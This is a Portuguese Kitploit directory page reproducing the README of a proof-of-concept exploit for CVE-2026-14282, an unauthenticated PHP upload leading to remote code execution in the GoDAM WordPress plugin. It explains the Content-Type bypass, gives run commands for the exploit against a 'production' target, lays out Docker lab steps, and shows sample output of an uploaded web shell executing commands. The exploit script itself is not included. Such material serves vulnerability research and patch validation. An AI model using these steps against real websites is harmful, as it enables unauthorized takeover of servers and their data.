Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-14282 — GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282) | Kitploit
Ferramentas/GitHubGitHub/nullwhisper/cve-2026-14282
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLabs & Practice
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)

Ver Repositório
1há 8 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-14282 — Plugin WordPress GoDAM <= 1.12.2 — Upload de Arquivo Não Autenticado -> RCE

Autor: nullwhisper
Caso de uso: somente pesquisa de segurança autorizada / validação de vulnerabilidade.

O que é isto?

As versões <= 1.12.2 do plugin WordPress GoDAM registam um campo WPForms chamado godam_record. O handler de upload save_video_file() é ligado à ação pública wpforms_process_before_filter, portanto é executado antes de qualquer verificação de autenticação. O handler confia no cabeçalho Content-Type controlado pelo atacante, aceita um ficheiro PHP desde que o tipo MIME comece por video/, e move-o para o diretório servido pela web wp-content/uploads/godam/wpforms/. Isto permite que um atacante não autenticado carregue e execute código PHP arbitrário.

  • CVE: CVE-2026-14282
  • Produto: Plugin WordPress GoDAM
  • Afetado: <= 1.12.2
  • Corrigido: 2.0.0
  • Tipo: Upload arbitrário de ficheiros não autenticado que leva a RCE
  • CVSS: 9.8 (Crítico)

Referências

  • Advertência da IONIX: https://www.ionix.io/threat-center/cve-2026-14282/
  • Registo CVE: https://www.cve.org/CVERecord?id=CVE-2026-14282
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
  • Página do plugin no WordPress.org: https://wordpress.org/plugins/godam/

Ficheiros

root@kitploit:~
.
├── cve_2026_14282_poc.py   # PoC principal
├── lab/
│   ├── docker-compose.yml  # Laboratório WordPress
│   └── setup.php           # Cria um formulário WPForms com o campo GoDAM
├── requirements.txt
└── README.md

Instalação

root@kitploit:~
pip3 install -r requirements.txt

Utilização

Alvo em produção

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form

O script deteta automaticamente o ID do formulário WPForms e o ID do campo GoDAM. Se a página contiver vários formulários ou se a deteção falhar, utilize:

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
    --form-id 4 --field-id 1 --cmd "whoami"

Laboratório local

  1. Transfira os plugins vulneráveis (não redistribua os binários):

    root@kitploit:~
    mkdir -p lab/wpforms-lite lab/godam
    cd lab/wpforms-lite
    wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
    unzip wpforms-lite.latest-stable.zip
    rm wpforms-lite.latest-stable.zip
    cd ../godam
    wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
    unzip godam.1.12.2.zip
    rm godam.1.12.2.zip
    cd ../..
    
  2. Inicie o laboratório:

    root@kitploit:~
    cd lab
    docker compose up -d
    
  3. Conclua o instalador do WordPress em http://127.0.0.1:8092.

  4. Instale e ative os plugins e, em seguida, crie o formulário e a página de teste:

    root@kitploit:~
    docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
    docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Execute o PoC:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
    

Verificado em localhost

Testado em WordPress 6.8 + WPForms Lite mais recente + GoDAM 1.12.2.

root@kitploit:~
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED

Porque é que os binários dos plugins não estão incluídos

Este repositório contém apenas o PoC e os ficheiros de orquestração do laboratório. Os binários dos plugins vulneráveis foram excluídos para evitar inchaço e problemas de distribuição. Transfira as versões vulneráveis específicas a partir do WordPress.org para o seu próprio laboratório.

Aviso legal

Esta ferramenta destina-se apenas a testes de segurança autorizados e investigação. Não a utilize contra sistemas que não possui ou para os quais não tem permissão explícita para testar. O autor não é responsável por utilização indevida ou danos causados por este código.

Baixar ferramenta